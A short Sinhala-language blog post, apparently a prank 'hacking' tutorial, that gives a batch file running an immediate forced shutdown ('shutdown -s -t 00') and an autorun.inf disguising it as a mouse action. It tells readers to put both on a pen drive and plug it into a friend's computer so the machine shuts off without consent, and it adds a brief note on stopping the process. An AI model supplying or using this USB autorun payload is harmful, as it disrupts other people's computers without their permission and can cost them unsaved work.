- මුලින්ම මේ පහලින් තියෙන code එක notepad එකට copy කරල past කරන්න පස්සේ එකට ඔයාට කැමති නමක් දිලා save කරගන්න. හැබයි file extension එකට .bat කියල දෙන්න ඒ වගේම File type එක All files කියලා දෙන්න පහල තියෙන පින්තුරේ වගේ.
- @echo off
- shutdown -s -t 00
- හරි දැන් කලින් විදිහටම ආයෙත් notepad එක open කරගෙන මේ code එකත් copy- past කරලා autorun.inf කියලා name එක දිලා save කරගන්නකො මේකේදි ඔයාලට name එක වෙනස් කරනන් බැ.file Type එකත් කලින් වගේම All files කියලා දෙන්න.
- [autorun]Open=besthacking.batAction=Mouse Disableදැන් අපි හදාගත්ත file දෙක pen drive එකකට දාලා යලුවෙක්ට හරි ගෙනිහින් computer එකට pen එක ගහුවා නම් වැඩේ හරි.ඔයාගෙන් අහන්නෙම නැතුව machine එක OFF වෙලා යයි. ON කරන හැම පාරම OFF වෙලා යයි. මේක කරා වගේ නෙමේ නේ නවත්තන හැටිත් දැන ගන්න එපැයි. මහලොකු දෙයක් නැ task maneger එකෙන් ගිහින් autorun කියන prosess එක නැවත්තුවනම් එක නතර වේවි.
Comments
Post a Comment